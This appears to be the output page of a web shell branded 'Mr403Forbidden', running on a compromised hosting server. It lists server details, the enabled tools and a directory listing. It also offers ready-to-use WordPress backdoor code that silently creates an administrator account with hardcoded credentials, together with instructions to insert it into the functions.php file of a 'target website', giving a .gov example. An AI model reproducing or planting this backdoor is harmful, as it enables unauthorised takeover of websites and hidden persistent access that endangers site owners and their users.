./Mr403Forbidden

:/opt/cloudlinux/ [ s--------- ]

System: Linux myhosting.zubahost.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
Software: LiteSpeed
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 194.163.174.55
Your IP: 216.73.216.138
User: business1 (1088) | Group: business1 (1091)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
mail

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
alt-php-internal dir 2025-07-02 1:34 - root/root s---------
alt-php44 dir 2024-01-26 9:46 - root/linksafe s---------
alt-php51 dir 2024-12-10 0:33 - root/linksafe s---------
alt-php74 dir 2026-03-02 18:30 - root/root s---------
alt-php80 dir 2026-03-02 18:30 - root/linksafe s---------
alt-php81 dir 2026-03-02 18:29 - root/linksafe s---------
alt-php82 dir 2026-03-02 18:29 - root/root s---------
alt-php83 dir 2026-03-02 18:31 - root/root s---------
alt-php84 dir 2026-03-02 18:30 - root/root s---------
alt-php85 dir 2026-03-02 18:30 - root/root s---------
flags dir 2024-01-26 8:16 - root/root s---------
rhn_hooks dir 2025-07-24 0:26 - root/root s---------
venv dir 2026-02-06 0:25 - root/root s---------
cl_edition file 2026-03-17 22:51 25 B root/root s---------
litespeed_status file 2026-03-18 2:49 1 B root/root s---------
nginx_status file 2026-03-18 2:49 1 B root/root s---------

© ./Mr403Forbidden